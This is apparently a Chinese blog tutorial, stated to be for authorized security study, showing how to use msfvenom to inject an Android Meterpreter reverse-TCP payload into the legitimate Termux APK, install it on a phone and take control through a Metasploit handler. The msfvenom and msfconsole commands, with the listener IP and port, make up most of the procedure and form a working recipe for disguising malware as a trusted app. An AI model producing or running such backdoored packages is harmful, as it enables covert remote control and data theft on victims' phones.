msfvenom生成apk后门,实现远程操控
2026/8/8 9:35:37 网站建设 项目流程

声明:本文内容仅供网络安全学习与研究使用,请勿用于任何非法用途。作者对因使用本文内容而产生的任何直接或间接后果概不负责。请在合法合规的前提下进行测试,并确保已获得相关授权。

环境

  • kali 2024.4(虚拟机,网络模式为桥接模式)
  • apktool 2.11.1
  • 测试手机:荣耀20S

步骤

  1. 下载一个简单且已经签名过的apk作为模板,我选择的是termux(https://github.com/termux/termux-app/releases#release-v0.118.0),下载完成后重命名为template.apk

  1. 查看自己的虚拟机ip地址(必须是桥接模式,不能是NAT),然后进行注入,之后将生成的新的apk安装到手机上

msfvenom-pandroid/meterpreter/reverse_tcpLHOST=10.211.101.114LPORT=4444-xtemplate.apk-otest.apk

  1. 开启msfconsole,测试手机启动app,等待TCP连接成功
use exploit/multi/handlersetpayload android/meterpreter/reverse_tcpsetLHOST10.211.101.114setLPORT4444run

  1. 尝试查看测试手机信息、截图等操作

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询